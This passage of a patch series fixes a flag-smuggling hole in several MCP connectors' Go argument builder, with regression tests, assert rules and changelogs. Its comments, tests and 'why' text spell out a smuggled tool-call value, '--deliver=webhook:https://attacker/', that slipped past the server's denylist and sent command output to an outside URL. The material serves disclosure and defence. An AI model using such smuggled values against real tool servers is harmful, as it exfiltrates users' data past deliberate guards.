           "file": "cli/internal/mcp/cobratree/shellout_test.go",
           "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-          "min_count": 1
+          "min_count": 1,
+          "code_only": true
+        },
+        {
+          "file": "cli/internal/mcp/cobratree/shellout_test.go",
+          "contains": "\"--filter=map[a:1]\"",
+          "min_count": 1,
+          "code_only": true
         }
       ]
     }

--- a/skills/resourceguru/handfixes.json
+++ b/skills/resourceguru/handfixes.json
@@ -370,6 +370,35 @@
           "not_contains": "t.Skip(\"bearer-style credential test incompatible"
         }
       ]
+    },
+    {
+      "id": "mcp-argv-value-joined",
+      "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+      "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+      "status": "active",
+      "asserts": [
+        {
+          "file": "cli/internal/mcp/cobratree/shellout.go",
+          "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+          "min_count": 1,
+          "code_only": true
+        },
+        {
+          "file": "cli/internal/mcp/cobratree/shellout.go",
+          "contains": "\"--\"+k+\"=\"+",
+          "min_count": 4,
+          "code_only": true
+        },
+        {
+          "file": "cli/internal/mcp/cobratree/shellout.go",
+          "not_contains": "\"--\"+k, "
+        },
+        {
+          "file": "cli/internal/mcp/cobratree/shellout_test.go",
+          "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+          "min_count": 1
+        }
+      ]
     }
   ]
 }

--- a/skills/rewst/CHANGELOG.md
+++ b/skills/rewst/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26
 

--- a/skills/rewst/CHANGELOG.md
+++ b/skills/rewst/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26

--- a/skills/rewst/CHANGELOG.md
+++ b/skills/rewst/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.3]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.2] - 2026-08-26
 
 ### Fixed

--- a/skills/rewst/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/rewst/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/rewst/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/rewst/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/rewst/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/rewst/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/rewst/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/rewst/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/rewst/handfixes.json
+++ b/skills/rewst/handfixes.json
@@ -269,8 +269,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -280,7 +292,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/rewst/handfixes.json
+++ b/skills/rewst/handfixes.json
@@ -254,6 +254,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/rocketcyber/CHANGELOG.md
+++ b/skills/rocketcyber/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26
 

--- a/skills/rocketcyber/CHANGELOG.md
+++ b/skills/rocketcyber/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26

--- a/skills/rocketcyber/CHANGELOG.md
+++ b/skills/rocketcyber/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.3]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.2] - 2026-08-26
 
 ### Fixed

--- a/skills/rocketcyber/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/rocketcyber/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/rocketcyber/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/rocketcyber/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/rocketcyber/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/rocketcyber/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/rocketcyber/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/rocketcyber/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/rocketcyber/handfixes.json
+++ b/skills/rocketcyber/handfixes.json
@@ -126,6 +126,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/rocketcyber/handfixes.json
+++ b/skills/rocketcyber/handfixes.json
@@ -141,8 +141,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -152,7 +164,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/rootly/CHANGELOG.md
+++ b/skills/rootly/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
